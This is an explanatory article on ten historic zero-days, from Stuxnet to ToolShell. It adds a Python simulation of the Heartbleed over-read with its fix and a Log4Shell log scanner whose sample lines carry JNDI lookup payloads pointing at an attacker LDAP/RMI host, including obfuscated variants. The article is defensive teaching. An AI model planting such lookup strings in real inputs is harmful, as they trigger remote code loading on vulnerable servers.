The 10 Zero-Days That Made History:
Chronicle of a World Where the Invisible Becomes a Weapon

Introduction
Computer vulnerabilities are countless. But some, by their scale and consequences, permanently reshape the way we think about cybersecurity. Zero-days are among them. These flaws, exploited before a patch exists, have a unique character: they are a stark reminder that security always rests on a temporary illusion, namely that nobody hostile has found the weakness yet. In recent years, example after example has shown how these invisible cracks turn into powerful levers of economic, political, and technological disruption.
What Is a Zero-Day?
A zero-day is a vulnerability that is unknown to its vendor, or for which no security patch exists, at the time it is exploited or found in the wild. The term counts the days the vendor has had to fix the flaw: zero. An attacker holding a working exploit (a "zero-day exploit") can use it against every installation of the affected software, while defenders have no patch to apply, only workarounds and detection. The term is also used loosely: once a fix ships, the same flaw becomes an "n-day", and several of the incidents below did most of their damage as n-days, against systems that had not been patched.
From a technical standpoint, zero-days usually stem from ordinary programming errors: memory-safety bugs such as buffer overflows and use-after-free, missing input validation, unsafe handling of untrusted data (deserialization, lookup or template expansion), or poor cryptographic practices. But the reality goes beyond technicalities. A zero-day is not just a faulty line of code; it is the embodiment of the fragility of a hyperconnected world, where a tiny flaw can trigger global repercussions.
Why Do Some Zero-Days Make History?
Most discovered vulnerabilities are patched before being widely exploited. But some stand out because they combine three key elements:
> Innovation in the attack: a new method or an unprecedented attack surface.
> Scale of propagation: a domino effect on a global level.
> Economic, political, or societal consequences: beyond the code itself, it is trust in the digital world that begins to falter.
Ten Zero-Days That Changed the Game
1. Stuxnet (2010). When Code Becomes a Weapon
In 2010, security researchers discovered Stuxnet, a worm that had been quietly sabotaging the uranium-enrichment centrifuges at Iran's Natanz facility. The centrifuges were failing, but the cause was neither mechanical nor human error: Stuxnet reprogrammed the Siemens S7 PLCs that drove them while feeding operators recorded, normal-looking readings. It spread through Windows using four zero-days, including the LNK shortcut-parsing flaw (CVE-2010-2568) that ran code as soon as a USB stick's contents were displayed in Explorer, and it carried kernel drivers signed with code-signing certificates stolen from two Taiwanese hardware vendors.
For the first time at such a scale, software caused measurable physical damage. This was a turning point: computing had stepped out of the virtual world and into geopolitics. Could a nuclear facility still be considered just a "technical infrastructure" when invisible code could alter its functioning? After Stuxnet, critical industrial infrastructures (energy, transportation, water) could no longer be perceived as untouchable. The international community had to integrate cybersecurity into national defense doctrines.
2. EternalBlue (2017). The Weapon That Escaped
Developed by the NSA, EternalBlue exploited a flaw in the Windows SMBv1 implementation. The agency kept it secret for years; then the Shadow Brokers group obtained and published it in April 2017, one month after Microsoft had quietly patched the bug (MS17-010, CVE-2017-0144). Within weeks it powered WannaCry and then NotPetya. The result: paralyzed hospitals, multinationals at a standstill, and billions in damages. One caveat matters: by the time those worms spread, EternalBlue was no longer a zero-day. The damage came from the enormous population of unpatched and unsupported machines, and from SMBv1 still being enabled by default.
The lesson: when a state hoards a critical vulnerability, it risks having it turned against everyone. EternalBlue triggered a global reckoning on how intelligence agencies handle stockpiled vulnerabilities (in the United States, the Vulnerabilities Equities Process), accelerating debates around responsible disclosure and the need for states to cooperate rather than retain these digital weapons.
3. Heartbleed (2014). When the Internet Lost Trust
Though not a strict zero-day (CVE-2014-0160 was patched by the OpenSSL project on the day it was disclosed), Heartbleed had a similar impact. A missing bounds check in OpenSSL's implementation of the TLS heartbeat extension let any client read up to 64 KB of a server's process memory per request, repeatedly, and typically without the requests being logged. OpenSSL underpinned roughly two-thirds of active websites at the time, though only the subset running the 1.0.1 branch was vulnerable. Private keys, session cookies, passwords: whatever happened to be in memory was exposed.
The incident shed light on a troubling reality: the Internet's infrastructure often relies on open-source components maintained by a handful of volunteers. Recovery also took far more than applying the patch: every certificate whose private key might have been read had to be revoked and reissued, and passwords and sessions had to be rotated, because there was no way to tell what had been read. In response, several funding and auditing initiatives for critical open-source projects were launched, such as the Linux Foundation's Core Infrastructure Initiative.
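To make the bug class concrete, here is an added example (not OpenSSL's code, and not part of the original article) that models the heartbeat handler in Python. A request header claims a payload length; the vulnerable handler copies that many bytes from wherever the record sits in memory, and the patched handler refuses any record whose declared length does not fit inside the bytes actually received, which is exactly the check OpenSSL 1.0.1g added. Process memory is modelled as a single byte string with a constructed fake secret placed right after the record.

```python
import struct
from typing import Optional

HEARTBEAT_REQUEST = 0x01
HEARTBEAT_RESPONSE = 0x02
PADDING_LEN = 16  # RFC 6520 requires at least 16 bytes of padding after the payload

# Constructed sample. Process memory is modelled as one bytes object: the
# heartbeat record sits at the front and the bytes after it stand in for
# whatever happened to be adjacent on the heap (here, a fake private key).
SECRET = b"-----BEGIN RSA PRIVATE KEY-----(constructed sample, not a real key)"


def build_heartbeat(declared_len: int, payload: bytes) -> bytes:
    """Heartbeat record: type (1 byte) | payload_length (2 bytes) | payload | padding.
    declared_len is what the sender claims; nothing forces it to match len(payload)."""
    return struct.pack("!BH", HEARTBEAT_REQUEST, declared_len) + payload + b"\x00" * PADDING_LEN


def vulnerable_heartbeat(memory: bytes, record_len: int) -> bytes:
    """Pre-patch behaviour (OpenSSL 1.0.1 through 1.0.1f, modelled): the
    peer-supplied payload_length is trusted and copied straight into the
    response, regardless of how many bytes actually arrived (record_len)."""
    _, payload_len = struct.unpack("!BH", memory[:3])
    echoed = memory[3:3 + payload_len]  # the memcpy that over-reads adjacent memory
    return struct.pack("!BH", HEARTBEAT_RESPONSE, payload_len) + echoed + b"\x00" * PADDING_LEN


def patched_heartbeat(memory: bytes, record_len: int) -> Optional[bytes]:
    """Post-patch behaviour (OpenSSL 1.0.1g): the record is silently dropped
    unless header + declared payload + padding fit inside what was received."""
    if record_len < 1 + 2 + PADDING_LEN:
        return None
    _, payload_len = struct.unpack("!BH", memory[:3])
    if 1 + 2 + payload_len + PADDING_LEN > record_len:
        return None  # declared length exceeds the record: discard, as the fix does
    echoed = memory[3:3 + payload_len]
    return struct.pack("!BH", HEARTBEAT_RESPONSE, payload_len) + echoed + b"\x00" * PADDING_LEN


def attack(declared_len: int = 200) -> tuple:
    """A malicious request that sends 2 payload bytes but claims declared_len.
    Returns (what the vulnerable server echoes, what the patched server does)."""
    record = build_heartbeat(declared_len, b"hi")
    memory = record + SECRET
    return vulnerable_heartbeat(memory, len(record)), patched_heartbeat(memory, len(record))


def honest(payload: bytes = b"hi") -> Optional[bytes]:
    """A well-formed request is still answered by the patched server."""
    record = build_heartbeat(len(payload), payload)
    return patched_heartbeat(record + SECRET, len(record))


if __name__ == "__main__":
    leaked, dropped = attack()
    print("vulnerable server echoed %d bytes; secret included: %s" % (len(leaked), SECRET in leaked))
    print("patched server response to the same request:", dropped)
    print("patched server answers an honest request with:", honest()[3:5])
```

In the real bug the length field is 16 bits, so a single request leaked up to 64 KB, and nothing stopped the client from sending thousands of them. The fix is the one-line comparison in `patched_heartbeat`: bounds must come from what was received, never from what the peer claims.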
4. Shellshock (2014). The Ghost of Old Code
Bash, the default shell on most Linux systems, was about 25 years old when a critical flaw (CVE-2014-6271) was found in the way it imported function definitions from environment variables: any text following the function body was executed as a command. Wherever a network-facing program handed attacker-controlled input to Bash through the environment, as CGI scripts do with HTTP headers and as some DHCP clients do with server-supplied options, a single crafted request yielded remote command execution.
Millions of servers and embedded devices were exposed, and mass scanning and exploitation began within hours of disclosure.
Shellshock was a stark reminder: technical legacy is a liability. The older code gets, the more it becomes a potential minefield, especially when it is reachable through paths nobody thought of as an attack surface.
5. Pegasus (2016–2021). Espionage in the Smartphone Era
Developed by Israel's NSO Group, Pegasus exploited iOS and Android zero-days to remotely infect smartphones, first via links the target had to tap (the 2016 "Trident" chain exposed by Citizen Lab), later with zero-click exploits delivered through iMessage that required no interaction at all (FORCEDENTRY, CVE-2021-30860, in 2021). Journalists, diplomats, politicians, activists: thousands were targeted. Beyond the technical prowess, Pegasus transformed perceptions of cybersurveillance by proving that digital espionage power was no longer exclusive to states; it could be industrialized by private actors.
The scandal sparked parliamentary inquiries, diplomatic tensions, and revived the debate on international regulation of cyberweapons.
Paradoxically, while NSO Group was weakened by sanctions and blacklisting, Pegasus also showcased the military effectiveness and economic appeal of this shadowy market, where zero-days become both weapons of power and lucrative commodities.
6. Log4Shell (2021). The Ubiquitous Flaw
Discovered in late 2021, CVE-2021-44228, better known as Log4Shell, affected Log4j 2, a Java library used to manage application logs. Free and open-source, it was embedded in countless pieces of software, from cloud apps to enterprise services, even IoT devices. The exploit was deceptively simple: Log4j expanded lookup expressions such as ${jndi:ldap://attacker-host/x} inside the messages it logged, so any attacker-controlled string that reached a log call (a User-Agent header, a username, a chat message) made the application connect to the attacker's LDAP server and, on older JVMs, load and execute a class it returned. In practice, attackers could fully take over affected systems without authentication.
Within hours, cybercriminals weaponized it to:
- deploy ransomware in enterprise networks,
- install cryptominers on vulnerable servers,
- launch espionage campaigns.
Log4Shell brutally exposed the problem of software dependency. Millions of products embedded Log4j without their users—and sometimes even their developers—being aware of it.
The result: mass patching that was extremely complex, and in some cases impossible for certain embedded systems. This episode acted as a catalyst for initiatives such as the Software Bill of Materials (SBOM), aimed at mapping all software components used in a product to better anticipate such crises. It also highlighted another facet of the digital world: interdependence. A library invisible to the end user can shake the entire ecosystem. How can we secure a world where every piece of software rests on an almost infinite chain of dependencies?
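As an added example (not code from the original article or from the Log4j project), the scanner below runs over a handful of constructed access-log lines and flags JNDI lookups, including the nested-lookup and URL-encoded variants attackers used within days to evade naive searches for the literal string ${jndi:. The IP addresses and paths are invented, and the reduction rules model only the subset of Log4j's lookup substitution that those evasions relied on (default values with :-, lower, upper); any other lookup is replaced by an inert placeholder.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Constructed Apache-style access-log lines (documentation IP ranges, invented paths).
LOG_LINES = [
    '203.0.113.9 - - [10/Dec/2021:13:01:22 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:13:01:23 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:13:01:24 +0000] "GET /?x=${${lower:j}ndi:${lower:r}mi://198.51.100.7/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '203.0.113.9 - - [10/Dec/2021:13:01:25 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-d}ns://198.51.100.7/c}"',
    '203.0.113.9 - - [10/Dec/2021:13:01:26 +0000] "GET /?q=%24%7Bjndi%3Aldaps%3A%2F%2F198.51.100.7%2Fd%7D HTTP/1.1" 200 12 "-" "-"',
    '203.0.113.9 - - [10/Dec/2021:13:01:27 +0000] "GET /?price=${sys:user.home} HTTP/1.1" 200 12 "-" "-"',
]

INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")                         # innermost ${...}, nothing nested
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)  # ${jndi:<scheme>:


def _resolve_inner(body: str) -> str:
    """Reduce one innermost lookup the way Log4j's substitutor does for the
    obfuscations seen in the wild. Assumption: only the cases used to hide the
    word 'jndi' are modelled; anything else becomes an inert placeholder."""
    if ":-" in body:                        # ${env:NaN:-j} or ${::-j}  ->  "j"
        return body.split(":-", 1)[1]
    prefix, sep, rest = body.partition(":")
    if sep and prefix.lower() == "lower":  # ${lower:J}  ->  "j"
        return rest.lower()
    if sep and prefix.lower() == "upper":  # ${upper:j}  ->  "J"
        return rest.upper()
    return "<" + body + ">"                 # e.g. ${sys:user.home}: keep, but no longer a lookup


def find_jndi(text: str, max_rounds: int = 32) -> Optional[Tuple[str, str]]:
    """Return (scheme, normalized_text) if the text carries a JNDI lookup after
    URL-decoding and peeling nested lookups from the inside out, else None."""
    s = unquote(text)
    for _ in range(max_rounds):
        hit = JNDI_LOOKUP.search(s)
        if hit:
            return hit.group(1).lower(), s
        reduced = INNER_LOOKUP.sub(lambda m: _resolve_inner(m.group(1)), s)
        if reduced == s:  # nothing left to reduce
            break
        s = reduced
    return None


def scan_lines(lines: List[str]) -> List[Tuple[int, str]]:
    """(line index, JNDI scheme) for every line that carries a lookup."""
    hits = []
    for i, line in enumerate(lines):
        found = find_jndi(line)
        if found:
            hits.append((i, found[0]))
    return hits


if __name__ == "__main__":
    for idx, scheme in scan_lines(LOG_LINES):
        print("line %d: JNDI lookup via %s -> %s" % (idx, scheme, find_jndi(LOG_LINES[idx])[1]))
```

Pattern matching on logs is a stopgap for triage and hunting, not a fix: the lookups can be encoded in more ways than any regex anticipates, and the vulnerable code runs wherever a log call receives the string, not just on web front ends. The durable remedies were upgrading to a fixed Log4j release or removing the JndiLookup class from the jar, and blocking outbound LDAP/RMI from application servers so a successful lookup has nowhere to go.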
7. Chrome Zero-day (2021–2022). When the Browser Becomes the Target
For years, Chrome has been a frequent target of actively exploited zero-days, especially in its V8 JavaScript engine, where just-in-time compiler bugs turn into memory corruption that a malicious web page can trigger. Back in 2014, Google launched Project Zero, a research team whose mandate is to find such flaws, in Chrome and in other widely used software, before attackers do. In 2021 and 2022, several Chrome vulnerabilities were nonetheless exploited in the wild for remote code execution in espionage campaigns against journalists and political dissidents.
The impact: even a seemingly mundane tool, the widely used web browser, proved to be a strategic target. Google rushed emergency patches and shortened its update cadence to minimize exposure. One caveat for defenders: a V8 bug alone lands the attacker inside Chrome's renderer sandbox, so real in-the-wild chains pair it with a second flaw to escape, which is why browser zero-days are usually found in pairs.
The threat remains constant: in 2025 alone, several critical zero-days (CVE-2025-5419, CVE-2025-6554, CVE-2025-6558) were patched after being exploited in the wild, proving that browsers are still prime targets. Browsing, it turns out, means exposing yourself, and the only real defense is to apply browser updates within hours rather than weeks.
8. SharePoint (2025). When Collaboration Becomes the Entry Point
In July 2025, a critical vulnerability in on-premises Microsoft SharePoint Server (CVE-2025-53770, dubbed ToolShell; SharePoint Online was not affected) was exploited by attackers for unauthenticated remote code execution, and from there to access files and integrated services such as Teams and OneDrive. Over 75 servers were compromised, including within U.S. public administrations, before an emergency patch was issued. A caveat for responders: the attackers used their foothold to steal the servers' ASP.NET machine keys, which let them forge valid requests even after patching, so Microsoft's guidance was to rotate those keys and hunt for web shells, not merely to install the update.
The lesson: collaboration platforms – the backbone of hybrid work – are now strategic targets. Their compromise is not limited to isolated data theft but can open transversal access across an organization’s entire digital ecosystem (email, cloud storage, internal communications). The 2025 SharePoint incident confirmed that the attack surface is expanding with digital transformation, and that collaboration tools – often seen as productivity enablers – can become systemic entry points for espionage or sabotage.
9. PrintNightmare (2021). When the Printer Becomes a Trojan Horse
In June 2021, a critical vulnerability in the Windows Print Spooler service, which manages printing on every Windows system and runs by default on workstations, servers, and domain controllers alike, became public along with a working exploit. The disclosure was accidental: researchers published a proof of concept believing Microsoft's June patch for CVE-2021-1675 had fixed the bug, but the remote code execution path remained open and received its own identifier, CVE-2021-34527. Dubbed PrintNightmare, the flaw let any authenticated domain user ask a remote spooler to install a malicious printer driver, which the service did with SYSTEM privileges, giving an attacker full control of the target.
The symbolism was striking: a service perceived as trivial ended up threatening entire systems. In an enterprise network, one compromised low-privilege account was enough to take over print servers and domain controllers, and with them the entire Active Directory domain.
Consequences: PrintNightmare highlighted two key realities. First, that seemingly secondary services (like printing) can be critical entry points because they are ubiquitous and rarely monitored. Second, that premature disclosure of technical details without an available patch can significantly amplify risk. The practical response was to disable the spooler wherever it was not needed, starting with domain controllers, and in August 2021 Microsoft changed the default Point and Print behavior so that installing a printer driver requires administrator privileges (KB5005652). It was a reminder that cybersecurity is not only about the most complex layers but also about everyday functionalities, and that the principle of least privilege has to reach every functional layer of a system.
10. BlueKeep (2019). The Flaw That Made the World Tremble
Discovered in May 2019, BlueKeep (CVE-2019-0708) targeted the Remote Desktop Protocol (RDP) service used to access Windows machines remotely. A use-after-free in the RDP kernel driver, reachable before any credentials were checked, enabled unauthenticated remote code execution with SYSTEM privileges; Microsoft itself described the bug as wormable, comparable to the flaw behind WannaCry.
Its severity lay in its reach: the flaw affected Windows 7, Server 2008 and 2008 R2, and the long-unsupported Windows XP and Server 2003, still heavily used in hospitals, government agencies, and industry. Internet-wide scans at the time found close to a million RDP endpoints directly exposed.
Faced with the risk of a new digital pandemic, Microsoft took the extraordinary step of issuing patches even for unsupported versions, and enabling Network Level Authentication closed the unauthenticated path on systems that could not be patched immediately. Though the flaw was eventually exploited only on a limited scale (a cryptomining campaign in late 2019), it created widespread alarm. BlueKeep reminded the world that some vulnerabilities are so critical they trigger global mobilization (NSA, NCSC, CISA, etc.) before they evolve into full-blown catastrophes.
What These Flaws Reveal
Taken together, these ten episodes highlight several key lessons:
- Cybersecurity is systemic: a single weak link can bring down the entire chain.
- It is geopolitical: vulnerabilities become tools of power and surveillance.
- It is also philosophical: each flaw questions our relationship with trust, technological dependence, and privacy.
Ultimately, a zero-day is not just a bug. It is a revealer: a revealer of our vulnerabilities, but also of our ability to respond collectively.
Conclusion
These ten zero-days are not just technical stories. They tell the tale of a digital world that, as it grows in power, also grows in fragility. Each flaw is a call for humility: no technology is infallible, no infrastructure untouchable.
The question remains: should we fear these vulnerabilities, or see them as necessary reminders? Probably both. Because while they expose our weaknesses, they also force us to move forward – to invent new defenses, and to strengthen our collective vigilance.
Yet a new era is already emerging – one where artificial intelligence could both accelerate the discovery of zero-days and their exploitation. Algorithms capable of analyzing billions of lines of code or automatically generating attack scenarios will change the scale of the problem. Zero-days could become more frequent, more sophisticated, and spread faster than ever. Cybersecurity will then have to rely on AI as well – to detect, anticipate, and neutralize these threats.
In the end, zero-days are the mirror of our time: an era where digital technology is vital, where AI opens new possibilities, but where security will always remain a permanent work in progress.